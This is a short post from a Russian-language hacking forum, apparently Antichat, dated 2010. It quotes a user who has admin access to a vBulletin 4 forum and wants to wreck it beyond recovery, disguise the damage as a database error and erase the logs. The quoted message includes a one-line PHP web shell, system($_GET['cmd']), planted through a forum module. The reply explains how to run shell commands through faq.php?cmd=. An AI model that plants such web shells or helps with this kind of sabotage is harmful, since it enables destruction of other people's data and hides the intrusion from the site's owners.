
29.08.2010, 14:13
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Pavel1987
Привет!
вроде бы читал много про уязвимости вбуллетина, зашел в админку и попробовал залить через модули шелл adminer (скачал с сайта). Но через поиск по справки выполнить запрос не получилось.
Потом добавил еще один модуль с одной строчкой system($_GET["cmd"]);
И через так www.xz.сom/forumpath/faq.php?cmd= попробовал выполнить запрос sql для тестового удаления юзера. Такая же байда(((
Подскажите, что делаю ни так?
Если кратко, то есть форум VBULLETIN-4 и админский доступ к нему. Нужно как то положить форум что бы он стал не восстановим.при этом желательно что бы следы взлома не были обнаружены типа ошибка бд и что то в этом роде, удалить логи как то надо короче.
что посоветуете? заранее спасибо за помощь
www.xz.сom/forumpath/faq.php?cmd=command line commands
EX:www.xz.сom/forumpath/faq.php?cmd=ls -la
|
|
|